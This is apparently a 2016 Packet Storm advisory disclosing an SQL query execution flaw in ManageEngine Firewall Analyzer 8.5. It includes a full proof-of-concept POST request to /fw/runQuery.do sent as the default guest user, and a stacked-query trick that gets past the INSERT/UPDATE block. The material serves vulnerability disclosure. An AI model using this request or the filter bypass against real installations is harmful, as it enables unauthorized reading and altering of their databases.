ManageEngine Firewall Analyzer 8.5 SQL Injection

2016-02-22T00:00:00
ID PACKETSTORM:135884
Type packetstorm
Reporter Sachin Wagh
Modified 2016-02-22T00:00:00

Description

                                        
                                            `================================================================  
ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability  
================================================================  
  
Description :  
  
Vulnerability Type : ManageEngine Firewall Analyzer 8.5 SQL Query Execution  
Vulnerability  
Vulnerable Version : 8.5  
Vendor Homepage:https://www.manageengine.com/products/firewall/download.html  
CVE-ID :  
Severity : High  
Author – Sachin Wagh (@tiger_tigerboy)  
  
ManageEngine Firewall Analyzer is an agent less log analytics and  
configuration management software that helps network administrators to  
centrally collect,  
archive, analyze their security device logs and generate forensic reports  
out of it.  
  
The vulnerability exists due to an error in the RunQuerycommand. An  
authenticated, remote attacker could exploit  
this vulnerability via a crafted POST request. An exploit could allow the  
attacker to execute arbitrary SQL queries on the underlying database  
server.  
  
Every user has the ability to execute SQL queries through the  
"/fw/runQuery.do" script, including the default "guest" user.  
  
Below is the POST request, executed as "guest":  
  
POST /fw/runQuery.do HTTP/1.1  
Host: localhost:8500  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101  
Firefox/40.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost:8500/fw/runQuery.do  
Cookie: username=guest; password=8094789293; leftPanel=230px;  
JSESSIONID=3590F06EA06BBA9B0FC9A40405E1144F;  
JSESSIONIDSSO=96016151FC34CD1EA17192C6AF288A14; FWA_TABLE=TS  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 123  
  
execute=true&DatabaseType=postgres&query=select version()  
  
Access to queries starting with "INSERT" or "UPDATE" giving warning as  
"operation not permitted"  
  
But When executed query, like this:"SELECT 1;INSERT INTO ..." its not  
giving any warning.  
  
Affected Product:  
-----------------------------------------------------------------------------------------------------------------------  
  
Vulnerable Product:  
[+] ManageEngine Firewall Analyzer 8.5  
  
Credits & Authors  
------------------------------------------------------------------------------------------------------------------------  
Sachin Wagh (@tiger_tigerboy)  
  
Thanks.  
`